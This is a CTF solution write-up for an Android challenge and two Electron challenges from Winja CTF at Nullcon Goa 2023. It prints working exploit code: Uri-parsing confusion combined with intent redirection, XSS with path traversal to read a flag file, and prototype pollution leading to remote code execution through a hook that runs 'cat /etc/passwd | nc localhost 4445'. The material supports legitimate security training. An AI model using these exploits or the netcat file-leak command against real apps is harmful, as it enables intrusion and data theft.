Winja CTF Official Writeup | Nullcon Goa 2023

Hi there!

This blog post contains the write-ups for two Electron source-code challenges and one Android challenge that I created for Winja CTF at the Nullcon Goa event.

This is a vague write-up; I will update it soon.

Android Challenge

  1. Bypass the root detection and emulator check, if you are using either.
  2. Host an HTML file with the code below:

    <html>
    <body>
    <script type="text/javascript">
        // "app" is the object the challenge app exposes to its WebView;
        // calling makeToast() from the hosted page shows the flag in a toast.
        app.makeToast();
    </script>
    </body>
    </html>


  3. Now build one more application with the code below, replacing the ngrok URL with the URL of the hosted HTML page. You will see the flag in the toast and in the logs as well.

    import android.content.Intent;
    import android.net.Uri;
    import java.lang.reflect.Constructor;

    // Runs inside an Activity (for example in onCreate), since it calls startActivity().
    // The Uri is assembled through Uri's package-private classes via reflection:
    // getHost() still reports "winja.nullcon.net" (the authority), while the path
    // begins with "@<ngrok host>/flag.html", so the string form of the Uri is
    // https://winja.nullcon.net@<ngrok host>/flag.html and the hosted page is what
    // actually gets loaded.
    Uri uri;
    try {
        Class partClass = Class.forName("android.net.Uri$Part");
        Constructor partConstructor = partClass.getDeclaredConstructors()[0];
        partConstructor.setAccessible(true);

        Class pathPartClass = Class.forName("android.net.Uri$PathPart");
        Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
        pathPartConstructor.setAccessible(true);

        Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
        Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
        hierarchicalUriConstructor.setAccessible(true);

        // Part/PathPart constructors take the encoded and decoded forms of the value.
        Object authority = partConstructor.newInstance("winja.nullcon.net", "winja.nullcon.net");
        Object path = pathPartConstructor.newInstance("@e0e2-27-4-63-181.ngrok-free.app/flag.html", "@e0e2-27-4-63-181.ngrok-free.app/flag.html");
        // HierarchicalUri(scheme, authority, path, query, fragment)
        uri = (Uri) hierarchicalUriConstructor.newInstance("https", authority, path, null, null);
    } catch (Exception e) {
        System.out.println("Exception occurred");
        e.printStackTrace();
        throw new RuntimeException(e);
    }

    // The exported HandleActivity forwards the wrapped intent to the
    // non-exported DeepLinkActivity, which loads the Uri.
    Intent intent = new Intent();
    intent.setClassName("com.example.androidchall1", "com.example.androidchall1.DeepLinkActivity");
    intent.setData(uri);

    Intent intent1 = new Intent();
    intent1.setClassName("com.example.androidchall1", "com.example.androidchall1.HandleActivity");
    intent1.putExtra("activity", intent);

    startActivity(intent1);

Electron Application 1

  1. Using XSS, the user has to call the IPC API exposed to the renderer as `window.api`.
  2. The payload for that is below: it first registers a listener on the `reply` channel, then asks `sessionCheck` for a path that traverses out of the application directory to the flag file.

    </script><script>top.window.api.receive('reply',(e=>{alert(`${e}`)})); top.window.api.sessionCheck('session','../../../../../../home/ctf/flag.txt');</script>

Electron Application 2

  1. Host the HTML file below:

    <html>
    <body>
        <h1>Leak Internal module</h1>
        <script>
            const originalCall = Function.prototype.call;

            // Hook Function.prototype.call: webpack's bundle invokes module bodies
            // with its internal require function as an argument, so it appears
            // here as args[3] and can be captured from page context.
            Function.prototype.call = function (...args) {
                console.log(args);
                if (args[3] && args[3].name === '__webpack_require__') {
                    // console.log(args)
                    window.__test = args[3];
                    // The captured require reaches Node's "module" and from there child_process.
                    args[3]("module")._load("child_process").exec("cat /etc/passwd | nc localhost 4445");
                }
                return originalCall.apply(this, args);
            };
        </script>
    </body>
    </html>


  2. Use the payload below to gain RCE: the `keyword` parameter pollutes `ALLOWED_ATTR` through `__proto__` so that `onerror` and `src` become allowed attributes, and `append` injects an `<img>` tag that redirects the page to your hosted HTML file.

    keyword: __proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src
    append: <img src=1 onerror="document.location='<your html hosted file link>'">
